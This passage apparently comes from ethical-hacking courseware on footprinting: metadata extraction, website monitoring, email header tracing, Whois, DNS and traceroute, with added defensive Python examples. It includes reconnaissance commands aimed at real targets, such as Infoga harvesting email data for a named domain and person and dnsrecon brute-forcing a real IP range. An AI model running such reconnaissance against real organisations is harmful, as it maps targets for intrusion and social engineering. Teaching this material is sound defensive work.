Metagoofil extracts metadata of public documents belonging to a target company. It performs a Google search to identify documents (pdf, doc, xls, ppt, docx, pptx, and xlsx), downloads the documents to the local disk, and then extracts the metadata with different libraries such as Hachoir, PdfMiner, and others.
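Where the metadata actually lives can be seen without Metagoofil: a .docx file is a zip archive whose docProps/core.xml and docProps/app.xml carry the author, last editor, timestamps, and application version listed above. The following Python script is an added example for this section, not EC-Council's or Metagoofil's code; it builds a minimal .docx in memory (the title, user names, and company in it are invented), extracts the properties, and then shows the defender's counterpart, blanking the identifying fields before a document is published.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict

# Namespaces used by the Office Open XML property parts.
CORE_NS = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
DC_NS = "http://purl.org/dc/elements/1.1/"
DCTERMS_NS = "http://purl.org/dc/terms/"
APP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"

# Constructed property parts; every value is invented.
CORE_XML = f"""<?xml version="1.0" encoding="UTF-8"?>
<cp:coreProperties xmlns:cp="{CORE_NS}" xmlns:dc="{DC_NS}" xmlns:dcterms="{DCTERMS_NS}">
  <dc:title>Q3 Network Upgrade Plan</dc:title>
  <dc:creator>jdoe</dc:creator>
  <cp:lastModifiedBy>CORP\\jane.doe</cp:lastModifiedBy>
  <dcterms:created>2020-06-01T09:12:00Z</dcterms:created>
  <dcterms:modified>2020-06-15T16:40:00Z</dcterms:modified>
</cp:coreProperties>"""
APP_XML = f"""<?xml version="1.0" encoding="UTF-8"?>
<Properties xmlns="{APP_NS}">
  <Application>Microsoft Office Word</Application>
  <AppVersion>16.0000</AppVersion>
  <Company>Example Corp</Company>
</Properties>"""

# Fields that name people, machines or software; blanked by scrub_metadata.
SENSITIVE = {"creator", "lastModifiedBy", "Company", "Application", "AppVersion"}


def make_docx(core_xml: str, app_xml: str) -> bytes:
    """Smallest zip layout that still carries the two property parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("docProps/core.xml", core_xml)
        z.writestr("docProps/app.xml", app_xml)
        z.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


def _local(tag: str) -> str:
    return tag.split("}", 1)[1] if "}" in tag else tag


def extract_metadata(docx_bytes: bytes) -> Dict[str, str]:
    """Read every child element of core.xml and app.xml as {name: text}."""
    meta: Dict[str, str] = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in ("docProps/core.xml", "docProps/app.xml"):
            if part in z.namelist():
                for child in ET.fromstring(z.read(part)):
                    meta[_local(child.tag)] = child.text or ""
    return meta


def scrub_metadata(docx_bytes: bytes) -> bytes:
    """Rewrite the package with the SENSITIVE properties emptied."""
    src = zipfile.ZipFile(io.BytesIO(docx_bytes))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as dst:
        for name in src.namelist():
            data = src.read(name)
            if name in ("docProps/core.xml", "docProps/app.xml"):
                root = ET.fromstring(data)
                for child in root:
                    if _local(child.tag) in SENSITIVE:
                        child.text = ""
                data = ET.tostring(root, encoding="utf-8", xml_declaration=True)
            dst.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    doc = make_docx(CORE_XML, APP_XML)
    print("before:", extract_metadata(doc))
    print("after: ", extract_metadata(scrub_metadata(doc)))
```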
As shown in the screenshot, Metagoofil generates a report with usernames, software versions, and servers or machine names, which helps attackers in the information gathering phase.
Figure 2.53: Screenshot of Metagoofil
Other Techniques for Website Footprinting
= Monitoring Web Pages for Updates and Changes
Attackers monitor the target website to detect web updates. Monitoring the target website helps the attackers to access and identify password-protected pages, track changes in the login pages, extract changes in the software version and driver updates, extract and store images on the modified web pages, and so on. Attackers analyze the gathered information to detect underlying vulnerabilities in the target website, and based on these vulnerabilities, they perform exploitation of the target web application.
Web Updates Monitoring Tools
Web updates monitoring tools are capable of detecting any changes or updates on a particular website, and they can send notifications or alerts to interested users through email or SMS.
= WebSite-Watcher
Source: https://www.aignes.com
WebSite-Watcher helps to track websites for updates and automatic changes. When an update or change occurs, WebSite-Watcher automatically detects and saves the last two versions onto your disk. As shown in the screenshot, attackers use WebSite-Watcher to extract the older and newer versions of web pages related to the target website.
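The "keep the last two versions and alert on a change" mechanism behind such tools is the same one a site owner uses for defacement and unauthorized-change monitoring. The following Python script is an added example for this section and is not EC-Council's or WebSite-Watcher's code; it hashes a normalized copy of each page so that rotating CSRF tokens and timestamps do not raise alerts, and reports a unified diff when the substance changes. The three page versions are constructed inline.

```python
import difflib
import hashlib
import re
from typing import Dict, Optional, Tuple


def normalize(html: str) -> str:
    """Blank the parts that legitimately change on every fetch so only real
    edits alter the hash. Both patterns are assumptions about this sample site."""
    html = re.sub(r'name="csrf_token" value="[^"]*"', 'name="csrf_token" value=""', html)
    return re.sub(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}", "<TS>", html)


def fingerprint(html: str) -> str:
    return hashlib.sha256(normalize(html).encode("utf-8")).hexdigest()


class PageMonitor:
    """Keeps the previous snapshot per URL and returns a diff when it changes."""

    def __init__(self) -> None:
        self.snapshots: Dict[str, Tuple[str, str]] = {}   # url -> (hash, html)

    def check(self, url: str, html: str) -> Optional[str]:
        """None on first sight and when nothing meaningful changed; else a diff."""
        digest = fingerprint(html)
        previous = self.snapshots.get(url)
        self.snapshots[url] = (digest, html)
        if previous is None or previous[0] == digest:
            return None
        return "\n".join(difflib.unified_diff(
            normalize(previous[1]).splitlines(), normalize(html).splitlines(),
            "previous", "current", lineterm=""))


# Constructed page versions (not fetched from anywhere).
V1 = """<html><form><input name="csrf_token" value="a1b2"></form>
<footer>Generated 2020-07-01 10:00:00</footer>
<p>Powered by ExampleCMS 3.1</p></html>"""
V2 = V1.replace('value="a1b2"', 'value="c3d4"').replace("10:00:00", "11:30:00")  # only volatile parts
V3 = V2.replace("ExampleCMS 3.1", "ExampleCMS 3.2")  # a version bump, the kind of change the text describes


if __name__ == "__main__":
    monitor = PageMonitor()
    for version in (V1, V2, V3):
        change = monitor.check("http://corp.example/login", version)
        print("no change" if change is None else change)
```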
Figure 2.54: Screenshot of WebSite-Watcher
For example, attackers can search for the following information on the company's website and exploit it to launch further attacks on the target company:
= Company contact names, phone numbers, and email addresses
= Company locations and branches
= Partner information
= News
= Links to other sites
= Product, project, or service data
= Searching for Web Pages Posting Patterns and Revision Numbers
Copyright is a protecting mechanism provided by the law of a country, which grants the creator of an original work exclusive rights for its use and distribution. To restrict third parties from accessing their data freely, most organizations ensure that there is a copyright notice on every single piece of their published work. A typical copyright notice contains the following information:
= The Copyright Symbol ©
= The Year of Creation
= The Name of the Author
= A Rights Statement
An attacker can search for copyright notices on the web and use these details to perform a deep analysis of the target organization. Further, attackers can search and note down the revision number of a product. The revision number is a unique string that acts as an identifier for the revision of a given document, and it can be found within the documents of the company. Attackers can also search for the document numbers that are assigned to the documents after revision, which can be searched from the Internet and recorded to launch further attacks on the target.
= Monitoring Website Traffic of Target Company
Attackers can monitor a target company's website traffic using tools such as Web-Stat, Alexa, and Monitis to collect valuable information. These tools help collect information about the target's customer base, which helps attackers to disguise themselves as customers and launch social engineering attacks on the target. The information collected includes:
= Total visitors: Tools such as Clicky (https://clicky.com) find the total number of visitors browsing the target website.
Figure 2.55: Screenshot of Alexa
Email Footprinting
So far, we have discussed footprinting through search engines, footprinting using Google, footprinting through social networking sites, and website footprinting. Now, we will discuss email footprinting. This section describes how to track email communications, how to collect information from email headers, and email tracking tools.
Tracking Email Communications
Email tracking monitors the email messages of a particular user. This kind of tracking is possible through digitally time-stamped records that reveal the time and date when the target receives and opens a specific email. Email tracking tools allow an attacker to collect information such as IP addresses, mail servers, and service providers involved in sending the email. Attackers can use this information to build a hacking strategy and to perform social engineering and other attacks. Examples of email tracking tools include eMailTrackerPro, Infoga, and Mailtrack.
System information gathered about the victim using email tracking tools includes:
= Recipient's IP address: Allows tracking of the recipient's IP address
= Geolocation: Estimates and displays the location of the recipient on the map and may even calculate the distance from the attacker's location
= Operating System and Browser information: Reveals information about the operating system and the browser used by the recipient. The attacker can use this information to find loopholes in that version of the operating system and browser to launch further attacks
= Forward Email: Determines whether the email sent to the user is forwarded to another person
= Device Type: Provides information about the type of device used to open and read the email, e.g., desktop computer, mobile device, or laptop
= Path Travelled: Tracks the path through which the email traveled via email transfer agents from source to destination system
Each email header is a useful source of information about the target. The process of viewing the email header varies with different email programs. Commonly used email programs:
= eM Client
= Spike
= Mailbird Lite
= Claws Mail
= Mozilla Thunderbird
= SmarterMail Webmail
= Hiri
= Outlook
The email header contains the following information:
= Sender's mail server
= Date and time of receipt by the originator's email servers
= Authentication system used by the sender's mail server
= Data and time of sending the message
= A unique number assigned by mx.google.com to identify the message
= Sender's full name
= Sender's IP address and address from which the message was sent
The attacker can trace and collect all this information by performing a detailed analysis of the complete email header.
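The items listed above can be read out of a raw message with the standard library alone. The following Python script is an added example for this section, not EC-Council's code or that of any tracking tool named here; the message it analyzes is constructed inline using documentation addresses, so none of the hosts or people exist. It walks the Received chain from the last header (the first hop) to the first, which gives the path travelled and the originating IP address, and ends with the defender-side check that the DKIM-signing domain in Authentication-Results matches the visible From domain.

```python
import re
from email import message_from_string
from email.utils import parsedate_to_datetime
from typing import Dict, List

# Constructed message (no real hosts; RFC 5737 documentation addresses) with
# three Received hops, Authentication-Results, Message-ID, From and Date.
RAW_EMAIL = """\
Delivered-To: victim@corp.example
Received: from mx.corp.example (mx.corp.example [198.51.100.7])
        by mail.corp.example with ESMTPS id abc123
        for <victim@corp.example>; Mon, 06 Jul 2020 10:15:33 +0000
Received: from mail-out.example.net (mail-out.example.net [203.0.113.25])
        by mx.corp.example with ESMTPS id xyz789;
        Mon, 06 Jul 2020 10:15:31 +0000
Received: from [192.0.2.44] (unknown [192.0.2.44])
        by mail-out.example.net with ESMTPSA id q17;
        Mon, 06 Jul 2020 10:15:29 +0000
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=example.net; dkim=pass header.d=example.net
Message-ID: <20200706101529.0001@example.net>
From: "Jane Doe" <jane.doe@example.net>
To: victim@corp.example
Date: Mon, 06 Jul 2020 10:15:29 +0000
Subject: Quarterly figures

Please see attached.
"""

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def received_hops(msg) -> List[Dict]:
    """Each M T A prepends its own Received line, so the last one is the first hop."""
    hops = []
    for rcv in msg.get_all("Received", []):
        m_from = re.search(r"\bfrom\s+(\S+)", rcv)
        m_by = re.search(r"\bby\s+(\S+)", rcv)
        ip = IP_RE.search(rcv)
        hops.append({
            "from": m_from.group(1) if m_from else None,
            "by": m_by.group(1) if m_by else None,
            "ip": ip.group(1) if ip else None,
            # the timestamp follows the last ';' of a Received clause
            "time": parsedate_to_datetime(rcv.rsplit(";", 1)[-1].strip()),
        })
    hops.reverse()
    return hops


def analyze(raw: str) -> Dict:
    """Sender, path, origin IP, transit time and a From/DKIM alignment check."""
    msg = message_from_string(raw)
    hops = received_hops(msg)
    auth = msg.get("Authentication-Results", "")
    from_domain = re.search(r"@([\w.-]+)", msg.get("From", ""))
    dkim_domain = re.search(r"header\.d=([\w.-]+)", auth)
    return {
        "sender": msg["From"],
        "message_id": msg["Message-ID"],
        "path": hops,
        "origin_ip": hops[0]["ip"] if hops else None,        # the submitting client
        "transit_seconds": (hops[-1]["time"] - hops[0]["time"]).total_seconds() if hops else None,
        "auth": auth,
        # defender check: a signed domain that differs from the From domain is a spoofing tell
        "from_dkim_aligned": bool(from_domain and dkim_domain
                                  and from_domain.group(1) == dkim_domain.group(1)),
    }


if __name__ == "__main__":
    report = analyze(RAW_EMAIL)
    for hop in report["path"]:
        print(f"{hop['time'].isoformat()}  {hop['from']} -> {hop['by']}  ip={hop['ip']}")
    print("origin:", report["origin_ip"], "transit:", report["transit_seconds"], "s")
    print("From/DKIM aligned:", report["from_dkim_aligned"])
```

Received lines are trustworthy only from the first server you control inward; anything the sender's own servers wrote can be forged, which is why the origin IP should be read as a claim until the chain reaches your own gateway.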
Figure 2.56: Screenshot showing detailed analysis of the email header
Email Tracking Tools
Email tracking tools allow an attacker to track an email and extract information such as sender identity, mail server, sender's IP address, location, and so on. These tools send notifications automatically when the recipients open the mail and provide status information about whether the email was successfully delivered or not. Attackers use the extracted information to attack the target organization's systems by sending malicious emails.
= Infoga
Source: https://github.com
Infoga checks whether an email was leaked using the haveibeenpwned.com API. For example, the command
python infoga.py --domain microsoft.com --source all --breach -v 2 --report ../microsoft.txt
will retrieve all the publicly available email addresses related to the domain microsoft.com along with email account information.
python infoga.py --info m4ll0k@protonmail.com --breach -v 3 --report ../m4ll0k.txt
The above command will retrieve email account information for a specified email address.
= eMailTrackerPro
Source: http://www.emailtrackerpro.com
As shown in the screenshot, attackers use eMailTrackerPro to analyze email headers and extract information such as the sender's geographical location, IP address, and so on. It allows an attacker to review the traces later by saving past traces.
Figure 2.58: Screenshot of eMailTrackerPro
Whois Lookup
Whois Footprinting
Gathering network-related information such as "Whois" information about the target organization is important when planning an attack. In this section, we will discuss Whois footprinting, which helps in gathering domain information such as information regarding the owner of an organization, its registrar, registration details, its name server, and contact information. Whois footprinting focuses on how to perform a Whois lookup, analyze the Whois lookup results, and find IP geolocation information, as well as the tools used to gather Whois information.
Whois Lookup
Whois is a query and response protocol used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. This protocol listens to requests on port 43 (TCP). Regional Internet Registries (RIRs) maintain Whois databases, which contain the personal information of domain owners. For each resource, the Whois database provides text records with information about the resource itself and relevant information regarding assignees, registrants, and administrative information (creation and expiration dates).
= Thick Whois: Stores the complete Whois information for the particular set of data.
= Thin Whois: Stores only the name of the Whois server of the registrar of a domain, which in turn holds complete details on the data being looked up.
Whois query returns the following information:
= Domain name details
= Contact details of the domain owner
= Domain name servers
= NetRange
= When a domain has been created
= Expiry records
= Records last updated
An attacker queries a Whois database server to obtain information about the target domain name, contact details of its owner, expiry date, creation date, and so on, and the Whois server responds to the query with the requested information. Using this information, an attacker can create a map of the organization's network, mislead domain owners with social engineering, and then obtain internal details of the network.
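A Whois answer is plain key: value text, and the thin/thick distinction above shows up in it as a "Registrar WHOIS Server" line that names the next server to ask. The following Python script is an added example for this section, not EC-Council's code or any Whois product's; the record it parses is constructed to look like a registry's thin answer for a .com domain (the domain, registrar, name servers, and dates are all invented), and the summary it produces includes the two fields a domain owner should check on their own record: the transfer lock and the time left to expiry.

```python
from datetime import datetime, timezone
from typing import Dict, List

# Constructed sample of a port-43 reply: the registry's thin record, which
# names the registrar's Whois server holding the thick record. Not a real lookup.
SAMPLE_WHOIS = """\
   Domain Name: CERTIFIEDHACKER.COM
   Registry Domain ID: 0000000000_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.registrar.example
   Registrar URL: http://www.registrar.example
   Updated Date: 2020-01-15T08:00:00Z
   Creation Date: 2014-03-01T00:00:00Z
   Registry Expiry Date: 2021-03-01T00:00:00Z
   Registrar: Example Registrar, Inc.
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Name Server: NS1.HOSTING.EXAMPLE
   Name Server: NS2.HOSTING.EXAMPLE
   DNSSEC: unsigned
>>> Last update of whois database: 2020-07-06T10:00:00Z <<<
"""

# Fixed "today" so the example is reproducible (assumption for this example).
NOW = datetime(2020, 7, 6, tzinfo=timezone.utc)


def parse_whois(text: str) -> Dict[str, List[str]]:
    """Key: value lines into a dict; repeated keys (Name Server) accumulate."""
    rec: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(">>>") or ":" not in line:
            continue
        key, value = line.split(":", 1)
        rec.setdefault(key.strip().lower(), []).append(value.strip())
    return rec


def _date(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def summarize(rec: Dict[str, List[str]], now: datetime) -> dict:
    """The fields a footprinter reads, plus the two an owner should watch."""
    expires = _date(rec["registry expiry date"][0])
    statuses = " ".join(rec.get("domain status", []))
    return {
        "domain": rec["domain name"][0].lower(),
        "registrar": rec["registrar"][0],
        # thin registry -> thick registrar: the server to query next
        "referral": rec.get("registrar whois server", [None])[0],
        "name_servers": [ns.lower() for ns in rec.get("name server", [])],
        "created": _date(rec["creation date"][0]),
        "expires": expires,
        "days_to_expiry": (expires - now).days,
        # without a transfer lock, a social-engineered registrar request can move the domain
        "transfer_locked": "clientTransferProhibited" in statuses,
        "dnssec": rec.get("dnssec", ["unknown"])[0] != "unsigned",
    }


def example_summary() -> dict:
    return summarize(parse_whois(SAMPLE_WHOIS), NOW)


if __name__ == "__main__":
    for key, value in example_summary().items():
        print(f"{key:>16}: {value}")
```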
Regional Internet Registries (RIRs)
The RIRs include:
= ARIN (American Registry for Internet Numbers) (https://www.arin.net)
= AFRINIC (African Network Information Center) (https://www.afrinic.net)
= APNIC (Asia Pacific Network Information Center) (https://www.apnic.net)
= RIPE (Réseaux IP Européens Network Coordination Centre) (https://www.ripe.net)
= LACNIC (Latin American and Caribbean Network Information Center) (https://www.lacnic.net)
Whois Lookup Result Analysis
Whois services such as http://whois.domaintools.com or https://www.tamos.com can help to perform Whois lookups. The screenshot shows the result analysis of a Whois lookup obtained with the two above-mentioned Whois services. The services perform a Whois lookup by entering the target's domain or IP address. The domaintools.com Whois service provides information about an IP address or domain, such as registrant information, including email, administrative contact information, creation and expiry date, hostname, state or province, city, phone number, fax number, and list of domain servers. SmartWhois, available at http://www.tamos.com, gives information about the country, name of the network provider, administrator, and technical support contact information. It also helps in finding the owner of the domain, the owner's contact information, the owner of the IP address block, registered date of the domain, and so on. It supports Internationalized Domain Names (IDNs), which means one can query domain names that use non-English characters. It also supports IPv6 addresses.
Whois Record for CertifiedHacker.com
Figure 2.59: Screenshot of Whois
Figure 2.60: Screenshot of SmartWhois
Attackers use Whois lookup tools such as Batch IP Converter, WhoisAnalyzer Pro, and ActiveWhois to extract information such as IP addresses, hostnames or domain names, registrant and network information, DNS records, including country, city, state, phone and fax numbers, service providers, administrators, and technical support information, for any IP address or domain name.
Finding IP Geolocation Information
IP geolocation helps to obtain information regarding a target such as its country, region/state, city, latitude and longitude of its city, ZIP/postal code, time zone, connection speed, ISP (hosting company), domain name, IDD country code, area code, weather station code and name, mobile carrier, and elevation.
Figure 2.61: Screenshot of IP2Location
Extracting DNS Information
DNS Footprinting
After collecting Whois records about the target, the next phase in the footprinting methodology is DNS footprinting. Attackers perform DNS footprinting to gather information about DNS servers, DNS records, and types of servers used by the target organization. This information helps attackers to identify the hosts connected in the target network and perform further exploitation on the target organization. This section describes how to extract DNS information, perform the reverse DNS lookup, and collect information from DNS zone transfers, as well as DNS interrogation tools.
Extracting DNS Information
DNS footprinting reveals information about DNS zone data. DNS zone data include DNS domain names, computer names, IP addresses, and much more information about a network. An attacker uses DNS information to determine key hosts in the network and then performs social engineering attacks to gather even more information.
DNS footprinting helps in determining the following records about the target DNS:
Record Type    Description
A              Points to a host's IP address
MX             Points to domain's mail server
NS             Points to host's name server
CNAME          Canonical naming allows aliases to a host
SOA            Indicate authority for a domain
SRV            Service records
PTR            Maps IP address to a hostname
RP             Responsible person
HINFO          Host information record includes CPU type and OS
TXT            Unstructured text records
Table 2.7: DNS records and their description
DNS interrogation tools such as Professional Toolset (https://tools.dnsstuff.com) and DNS Records (https://network-tools.com) enable the user to perform DNS footprinting. DNSstuff (Professional Toolset) extracts DNS information about IP addresses, mail server extensions, DNS lookups, Whois lookups, and so on. It can extract a range of IP addresses using an IP routing lookup. If the target network allows unknown, unauthorized users to transfer DNS zone data, then it is easy for an attacker to obtain the information about DNS with the help of the DNS interrogation tool. When the attacker queries the DNS server using the DNS interrogation tool, the server responds with a record structure that contains information about the target DNS. DNS records provide important information about the location and types of servers.
Figure 2.62: Screenshot of Professional Toolset
Attackers also use DNS lookup tools such as DNSdumpster.com, Bluto, and Domain Dossier to retrieve DNS records for a specified domain or hostname. These tools retrieve information such as domains and IP addresses, domain Whois records, DNS records, and network Whois records.
Reverse DNS Lookup

DNS lookup is used for finding the IP addresses for a given domain name, and the reverse DNS operation is performed to obtain the domain name of a given IP address. When you are looking for a domain and type the domain name in the browser, the DNS converts that domain name into an IP address and forwards the request for further processing. This conversion of a domain name into an IP address is performed by a record. Attackers perform a reverse DNS lookup on the IP range to locate DNS PTR records for such IP addresses. Attackers use various tools such as DNSRecon and Reverse IP Domain Check for performing the reverse DNS lookup on the target host or a range of IP addresses. When we get an IP address, we can use these tools to obtain the domain name.
DNSRecon

Source: https://github.com

As shown in the screenshot, attackers use the following command to perform a reverse DNS lookup on the target host:

dnsrecon -r 162.241.216.0-162.241.216.255

In the above command, the -r option specifies the range of IP addresses (first-last) for a reverse lookup by brute force.
Figure 2.63: Screenshot of DNSRecon showing reverse DNS lookup information
Reverse IP Domain Check

Source: https://www.yougetsignal.com

As shown in the screenshot, a reverse IP domain check takes a domain name or IP address pointing to a web server and searches for other sites known to be hosted on the same web server.
Figure 2.64: Screenshot of Reverse IP Domain Check
Network Footprinting

The next step after retrieving the DNS information is gathering network-related information. We will now discuss network footprinting, a method of gathering the footprint of the target organization's network. This section describes how to locate the network range, traceroute analysis, and traceroute tools.
Locate the Network Range

One needs to gather basic and important information about the target organization, such as what the organization does, who works there, and what type of work they perform, to perform network footprinting. The answers to these questions provide information about the internal structure of the target network.

After gathering the information, an attacker can proceed to find the network range of a target system. Detailed information is available from the appropriate regional registry database regarding IP allocation and the nature of the allocation. An attacker can also determine the subnet mask of the domain and trace the route between the system and the target system. Traceroute tools that are widely used include Path Analyzer Pro and VisualRoute.

Obtaining private IP addresses can be useful to attackers. The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private internets: 10.0.0.0-10.255.255.255 (10/8 prefix), 172.16.0.0-172.31.255.255 (172.16/12 prefix), and 192.168.0.0-192.168.255.255 (192.168/16 prefix).

Using the network range, the attacker can get information about how the network is structured and which machines in the networks are alive. Using the network range also helps to identify the network topology, access control device, and OS used in the target network. To find the network range of the target network, one needs to enter the server IP address (that was gathered in Whois footprinting) in the ARIN Whois database search tool. A user can also visit the ARIN website (https://www.arin.net/about/welcome/region) and enter the server IP in the SEARCH Whois text box. This gives the network range of the target network. Improperly set up DNS servers offer attackers a good chance of obtaining a list of internal machines on the server. In addition, sometimes, if an attacker traces a route to a machine, it is possible to obtain the internal IP address of the gateway, which can be useful.
Figure 2.65: Screenshot of ARIN's Region
Figure 2.66: Screenshot showing the result of an ARIN Whois database search

Attackers typically use more than one tool to obtain network information, as a single tool cannot provide all the required information.
Traceroute
Traceroute uses the ICMP protocol concept and the Time to Live (TTL) field of the IP header to find the path to the target host in the network.

The Traceroute utility can detail the path through which IP packets travel between two systems. The utility can trace the number of routers the packets travel through, the round-trip time (duration in transiting between two routers), and, if the routers have DNS entries, the names of the routers and their network affiliation. It can also trace geographic locations. It works by exploiting a feature of the Internet Protocol called TTL. The TTL field indicates the maximum number of routers a packet may traverse. Each router that handles a packet decrements the TTL count field in the IP header by one. When the count reaches zero, the router discards the packet and transmits an ICMP error message to the originator of the packet.
Figure 2.67: Illustration of Traceroute
The utility records the IP address and DNS name of the router in the path, and then sends out another packet with a TTL value of two. This packet makes it through the first router and then times out at the next router in the path. This second router also sends an error message back to the originating host. Traceroute continues to do this and records the IP address and name of each router until a packet finally reaches the target host or until it decides that the host is unreachable. In the process, it records the time taken for each packet to make a round trip to each router. Finally, when it reaches the destination, the normal ICMP ping response will be sent back to the sender. The utility helps to reveal the IP addresses of the intermediate hops in the route to the target host from the source.
ICMP Traceroute

Windows operating system by default uses ICMP traceroute. Go to the command prompt and type the tracert command along with the destination IP address or domain name as follows:

C:\>tracert 216.239.36.10

Tracing route to ns3.google.com [216.239.36.10] over a maximum of 30 hops
  1    <1 ms    <1 ms    <1 ms  10.10.10.2
  2    20 ms     4 ms     5 ms  1.6.15.234
  3    21 ms    19 ms    21 ms  100.66.8.23
  4    20 ms    19 ms    19 ms  100.68.8.23
  5    23 ms    42 ms    20 ms  72.14.210.200
  6    21 ms    21 ms    23 ms  108.170.248.163
  7    68 ms    67 ms    67 ms  209.85.242.115
  8   102 ms   102 ms           209.85.247.194
  9   100 ms   106 ms           72.14.239.175
 10   aiams    119 ms           209.85.244.31
 11   aiams    112 ms           209.85.247.118
 12   ai4ms    118 ms           74.125.253.85
 13   aii ms   112 ms           ns3.google.com [216.239.36.10]
Trace complete.
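The text notes that a trace may expose an internal gateway in one of the three IANA private blocks. This added example (not part of the courseware) parses Windows tracert output and flags such hops; the sample output is constructed to mirror the format above, with the first hop 10.10.10.2 taken from it and a second private hop 192.168.1.1 added as an assumption.

```python
"""Flag private (RFC 1918) hops in Windows tracert output.

Added example, not from the CEH courseware. The sample below is constructed
to mirror the tracert format shown in the text; hop 192.168.1.1 is an
assumption added to exercise the second private block.
"""
import ipaddress
import re

# The three private blocks reserved by IANA, as listed in the text.
PRIVATE_BLOCKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# Constructed sample in Windows tracert format (not real output).
SAMPLE_TRACERT = """\
Tracing route to ns3.google.com [216.239.36.10]
over a maximum of 30 hops:

  1    <1 ms    <1 ms    <1 ms  10.10.10.2
  2    20 ms     4 ms     5 ms  192.168.1.1
  3    21 ms    19 ms    21 ms  100.66.8.23
  4     *        *        *     Request timed out.
  5    23 ms    42 ms    20 ms  72.14.210.200
  6   111 ms   112 ms   112 ms  ns3.google.com [216.239.36.10]

Trace complete.
"""

# A hop line: hop number, three RTT columns (or '*'), then host and/or [address].
HOP_RE = re.compile(
    r"^\s*(?P<hop>\d+)\s+"
    r"(?P<rtts>(?:(?:<?\d+ ms|\*)\s+){3})"
    r"(?P<rest>.+?)\s*$"
)
ADDR_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")


def parse_tracert(text):
    """Return a list of (hop_number, ip_or_None) from tracert output."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue  # banner, blank and 'Trace complete.' lines
        addr = ADDR_RE.search(m.group("rest"))
        hops.append((int(m.group("hop")), addr.group(1) if addr else None))
    return hops


def is_private(ip):
    """True if ip falls in one of the three IANA private blocks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in block for block in PRIVATE_BLOCKS)


def private_hops(text):
    """Hops whose address is private: the internal gateways a trace leaks."""
    return [(hop, ip) for hop, ip in parse_tracert(text) if ip and is_private(ip)]


if __name__ == "__main__":
    for hop, ip in private_hops(SAMPLE_TRACERT):
        print(f"hop {hop}: {ip} is in a private range")
```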
TCP Traceroute

Many devices in any network are generally configured to block ICMP traceroute messages. In this scenario, an attacker uses TCP or UDP traceroute, which is also known as Layer 4 traceroute. Go to the terminal in the Linux operating system and type the tcptraceroute command along with the destination IP address or domain name as follows:

tcptraceroute www.google.com

Figure 2.68: Screenshot showing the output of TCP Traceroute
UDP Traceroute

Like Windows, Linux also has a built-in traceroute utility, but it uses the UDP protocol for tracing the route to the destination. Go to the terminal in the Linux operating system and type the traceroute command along with the destination IP address or domain name as follows:

traceroute www.google.com

Figure 2.69: Screenshot showing the output of UDP Traceroute
Traceroute Analysis

We have seen how the Traceroute utility helps to find the IP addresses of intermediate devices such as routers and firewalls present between a source and its destination. After running several traceroutes, an attacker will be able to find the location of a hop in the target network. Consider the following traceroute results obtained:

+ traceroute 1.10.10.20, second to last hop is 1.10.10.1
+ traceroute 1.10.20.10, third to last hop is 1.10.10.1
+ traceroute 1.10.20.10, second to last hop is 1.10.10.50
+ traceroute 1.10.20.15, third to last hop is 1.10.10.1
+ traceroute 1.10.20.15, second to last hop is 1.10.10.50

By analyzing these results, an attacker can draw the network topology diagram of the target network, as shown below.

Figure 2.70: Traceroute Analysis
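The TTL-expiry mechanism described in the Traceroute section and the hop analysis above, as one added example (not from the courseware): a simulated traceroute over a constructed topology, followed by the merge of several traces into an adjacency map. The router and host addresses are those of the analysis; the edge router 203.0.113.1 and the forwarding tables are assumptions.

```python
"""Simulated traceroute (TTL expiry) and topology inference.

Added example, not from the CEH courseware. Node addresses are the ones from
the traceroute-analysis passage; the edge router 203.0.113.1 and the
forwarding tables are constructed so that each path has several hops.
"""

HOSTS = {"1.10.10.20", "1.10.20.10", "1.10.20.15"}   # end hosts (no forwarding)
FIRST_HOP = "203.0.113.1"                             # constructed edge router

# Constructed forwarding tables: router -> {destination: next hop}.
ROUTES = {
    "203.0.113.1": {t: "1.10.10.1" for t in HOSTS},
    "1.10.10.1": {"1.10.10.20": "1.10.10.20",
                  "1.10.20.10": "1.10.10.50",
                  "1.10.20.15": "1.10.10.50"},
    "1.10.10.50": {"1.10.20.10": "1.10.20.10",
                   "1.10.20.15": "1.10.20.15"},
}


def probe(dst, ttl):
    """Send one probe with the given TTL. Return (replying node, reply kind).

    Every router decrements the TTL; at zero it discards the packet and
    answers with ICMP Time Exceeded, which is what traceroute relies on.
    """
    node = FIRST_HOP
    while True:
        if node == dst:
            return node, "echo-reply"        # destination answers the probe
        ttl -= 1
        if ttl == 0:
            return node, "time-exceeded"     # this router reports itself
        nxt = ROUTES.get(node, {}).get(dst)
        if nxt is None:
            return node, "unreachable"       # no route from this node
        node = nxt


def traceroute(dst, max_hops=30):
    """Raise the TTL one step at a time, recording who replied at each step."""
    hops = []
    for ttl in range(1, max_hops + 1):
        node, kind = probe(dst, ttl)
        hops.append((ttl, node, kind))
        if kind != "time-exceeded":
            break
    return hops


def path(dst):
    """Just the addresses along the route, the last one being the target."""
    return [node for _, node, _ in traceroute(dst)]


def infer_topology(paths):
    """Merge several paths into an adjacency map, as the analysis above does."""
    adj = {}
    for p in paths:
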